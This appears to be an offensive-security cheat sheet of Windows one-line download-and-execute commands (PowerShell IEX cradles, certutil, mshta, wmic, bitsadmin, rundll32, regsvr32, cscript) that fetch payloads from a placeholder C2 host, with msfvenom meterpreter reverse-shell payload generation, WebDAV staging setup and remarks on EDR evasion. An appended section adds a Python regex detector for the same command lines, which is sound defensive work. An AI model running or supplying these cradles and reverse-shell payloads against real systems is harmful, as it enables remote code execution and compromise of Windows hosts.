
Single line commands to download and execute malicious code are useful for a number of reasons:
- To exploit web application vulnerabilities, such as shell command injection
- When you have the ability to execute commands, but not directly copy files (via WMI for instance)
- To embed in other attack packages, such as macro-based malware or USB HID attacks
Having multiple techniques is useful, as endpoint detection and response (EDR) systems will typically use pattern-matching rules to detect some of these.
PowerShell
Very likely to be detected by EDR solutions.
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://www.c2server.co.uk/script.ps1')"
Proxy Aware Version
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://c2server.co.uk/script.ps1')|iex"
Base64 Encoded
Powershell -W Hidden -nop -noni -enc <base64 text>
Payload Generation
To base64 encode PowerShell scripts, use:
iconv -f ASCII -t UTF-16LE powershellscript.txt | base64 | tr -d "\n"
Certutil
Windows Defender picks up on this technique.
certutil -urlcache -split -f http://www.c2server.co.uk/bg.exe bg.exe && bg.exe
MSHTA
mshta http://www.c2server.co.uk/script.hta
WMIC
Windows Defender picks up on this technique.
wmic os get /format:"http://www.c2server.co.uk/stylesheet.xsl"
Payload Generation
Stylesheet to load calc.exe:
<xsl:stylesheet xmlns:xsl="http://www.w3.org/TR/WD-xsl">
  <xsl:script language="VBScript">
    <![CDATA[
      Set shl = CreateObject("Wscript.Shell")
      Call shl.Run("""calc.exe""")
    ]]>
  </xsl:script>
  <xsl:template match="/">
    <xsl:apply-templates select="//RESULTS"/>
    <xsl:apply-templates select="//INSTANCE"/>
    <xsl:eval no-entities="true" language="VBScript">DisplayValues(this)</xsl:eval>
  </xsl:template>
  <xsl:template match="RESULTS">
    <xsl:eval no-entities="true" language="VBScript">CountResults(this)</xsl:eval>
  </xsl:template>
  <xsl:template match="INSTANCE">
    <xsl:eval language="VBScript">GotInstance()</xsl:eval>
    <xsl:apply-templates select="PROPERTY|PROPERTY.ARRAY|PROPERTY.REFERENCE"/>
  </xsl:template>
</xsl:stylesheet>
Bitsadmin
bitsadmin /rawreturn /transfer payload http://www.c2server/bg.exe %cd%\bg.exe && bg.exe
If you get an error such as 0x80070057, the output path may be incorrectly specified or not writable.
Rundll32
rundll32 \\webdavserver\folder\payload.dll,DLLMain
Payload Generation
msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=4444 -f DLL > /var/www/webdav/payload.dll
Regsvr32
Windows Defender picks up on this technique.
regsvr32 /u /n /s /i:http://www.c2server.co.uk/test.html scrobj.dll
Payload Generation
Contents of test.html:
<?XML version="1.0"?>
<scriptlet>
  <registration progid="foo" classid="{F0001111-0000-0000-0000-0000FEEDACDC}">
    <script language="JScript">
      <![CDATA[var r = new ActiveXObject("WScript.Shell").Run("cmd /k echo bordergate_test");]]>
    </script>
  </registration>
</scriptlet>
Cscript
This requires reading a file from a WebDAV share:
cscript //E:vbscript \\www.c2server.co.uk\webdav\test.vbs
WebDAV Share Configuration in Kali
sudo apt install -y davfs2
sudo a2enmod dav
sudo a2enmod dav_fs
sudo mkdir /var/www/webdav
sudo chown -R www-data:www-data /var/www/
Edit Apache Config File
/etc/apache2/sites-available/000-default.conf
Add to top of file:
DavLockDB /var/www/DavLock
Add to VirtualHost section:
Alias /webdav /var/www/webdav
<Directory /var/www/webdav>
    DAV On
</Directory>
Testing
cadaver http://127.0.0.1/webdav
Generate VBS Meterpreter
msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=4444 -f vbs --arch x86 --platform win
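As an added defensive example (not part of the original post), the following Python mimics the kind of pattern matching an EDR applies to process-creation command lines for the one-liners listed above, decoding a PowerShell -enc payload from base64/UTF-16LE before matching so the hidden cradle is visible to the rules. The sample command lines are constructed, and the rule names and regexes are my own, not any vendor's.

```python
import base64
import re

# Constructed sample process-creation command lines (not real telemetry): one per
# technique on the page, plus a benign certutil call that must not alert.
ENC_B64 = base64.b64encode("iwr http://www.c2server.co.uk/a.ps1 | iex".encode("utf-16-le")).decode()
SAMPLE_CMDLINES = [
    "powershell -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://www.c2server.co.uk/script.ps1')\"",
    "powershell -w hidden -nop -noni -enc " + ENC_B64,
    "certutil -urlcache -split -f http://www.c2server.co.uk/bg.exe bg.exe",
    "mshta http://www.c2server.co.uk/script.hta",
    'wmic os get /format:"http://www.c2server.co.uk/stylesheet.xsl"',
    "bitsadmin /rawreturn /transfer payload http://www.c2server.co.uk/bg.exe C:\\tmp\\bg.exe",
    "rundll32 \\\\webdavserver\\folder\\payload.dll,DLLMain",
    "regsvr32 /u /n /s /i:http://www.c2server.co.uk/test.html scrobj.dll",
    "cscript //E:vbscript \\\\www.c2server.co.uk\\webdav\\test.vbs",
    "certutil -hashfile C:\\Windows\\notepad.exe SHA256",  # benign: must not fire
]

# -enc/-EncodedCommand carries base64 of a UTF-16LE script; the group captures it.
ENC_RE = re.compile(r"\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)
# One rule per LOLBin, keyed on the remote-fetch argument shape rather than the
# binary name alone, so ordinary local use of the same binary does not alert.
RULES = {
    "powershell_download_cradle": re.compile(
        r"powershell(?=.*\b(downloadstring|downloadfile|iwr|invoke-webrequest)\b)(?=.*\b(iex|invoke-expression)\b)", re.I),
    "powershell_encoded": ENC_RE,
    "certutil_urlcache": re.compile(r"certutil.*-urlcache.*https?://", re.I),
    "mshta_remote": re.compile(r"mshta\s+https?://", re.I),
    "wmic_remote_xsl": re.compile(r"wmic.*/format:\W{0,2}https?://", re.I),
    "bitsadmin_transfer": re.compile(r"bitsadmin.*/transfer.*https?://", re.I),
    "rundll32_unc_dll": re.compile(r"rundll32\s+\\\\\S+\.dll", re.I),
    "regsvr32_remote_sct": re.compile(r"regsvr32.*/i:https?://.*scrobj\.dll", re.I),
    "cscript_unc_path": re.compile(r"\b[cw]script\b.*\s\\\\\S+", re.I),
}

def classify(cmdline):
    """Rule names that fire; an -enc payload is decoded and appended first so the cradle rule sees it too."""
    expanded = cmdline
    m = ENC_RE.search(cmdline)
    if m:
        try:
            expanded += " " + base64.b64decode(m.group(1)).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            pass  # malformed payload: still flagged by powershell_encoded
    return [name for name, rx in RULES.items() if rx.search(expanded)]

def flagged(cmdlines):
    """Command lines matching at least one rule."""
    return [c for c in cmdlines if classify(c)]
```

Run against SAMPLE_CMDLINES, every technique line fires exactly one rule (the -enc line fires two, because the decoded script exposes the cradle) while the benign certutil hash call stays clean.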